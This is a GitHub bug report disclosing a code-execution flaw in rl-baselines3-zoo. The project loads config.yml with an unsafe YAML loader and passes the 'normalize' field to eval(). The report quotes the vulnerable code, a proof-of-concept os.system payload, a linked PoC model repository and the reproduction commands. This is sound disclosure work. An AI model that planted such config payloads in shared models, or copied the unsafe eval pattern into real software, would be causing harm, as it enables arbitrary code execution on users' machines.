Skip to content

[Bug]: Potential remote code execution via normalize field from untrusted config.yml #505

@Vancir

Description

@Vancir

🐛 Bug

Description
The rl-baselines3-zoo model loading pipeline accepts remote config.yml files that are parsed and later evaluates the normalize field using eval(). These values are loaded and executed in get_saved_hyperparams() when users download and run third-party model repositories.

config_file = os.path.join(stats_path, "config.yml")
if os.path.isfile(config_file):
# Load saved hyperparameters
with open(os.path.join(stats_path, "config.yml")) as f:
hyperparams = yaml.load(f, Loader=yaml.UnsafeLoader)
hyperparams["normalize"] = hyperparams.get("normalize", False)
else:
obs_rms_path = os.path.join(stats_path, "obs_rms.pkl")
hyperparams["normalize"] = os.path.isfile(obs_rms_path)
# Load normalization params
if hyperparams["normalize"]:
if isinstance(hyperparams["normalize"], str):
normalize_kwargs = eval(hyperparams["normalize"])

An attacker can publish a benign-looking model repository whose config.yml contains a malicious normalize field. When a victim downloads and loads the model using rl_zoo3 commands, the configuration file is deserialized and the attacker-controlled payload is evaluated, resulting in arbitrary code execution.

- - - batch_size
      - 256
   - - normalize
      - os.system('echo "You have been hacked!!!" && touch /tmp/hacked.txt')

This allows attackers to embed malicious commands in model configuration files and achieve remote code execution on victim machines during normal model loading and evaluation.

To Reproduce

I uploaded a proof-of-concept model repository on Huggingface for reproduction: https://huggingface.co/XManFromXlab/ppo-BreakoutNoFrameskip-v4

python -m rl_zoo3.load_from_hub --algo ppo --env BreakoutNoFrameskip-v4 -orga XManFromXlab -f logs/
python -m rl_zoo3.enjoy --algo ppo --env BreakoutNoFrameskip-v4 -f logs/

In this example, running the above commands will execute the attacker-controlled payload:

echo "You have been hacked!!!" && touch /tmp/hacked.txt

After execution, the file /tmp/hacked.txt is created, demonstrating successful arbitrary code execution.

Relevant log output / Error message

Loading latest experiment, id=1
Loading logs/ppo/BreakoutNoFrameskip-v4_1/BreakoutNoFrameskip-v4.zip
You have been hacked!!!

System Info

  • OS: Linux-6.8.0-88-generic-x86_64-with-glibc2.39 # 89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025
  • Python: 3.12.3
  • Stable-Baselines3: 2.8.0a2
  • PyTorch: 2.10.0+cu128
  • GPU Enabled: True
  • Numpy: 2.4.2
  • Cloudpickle: 3.1.2
  • Gymnasium: 1.2.3
  • OpenAI Gym: 0.26.2

Checklist

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions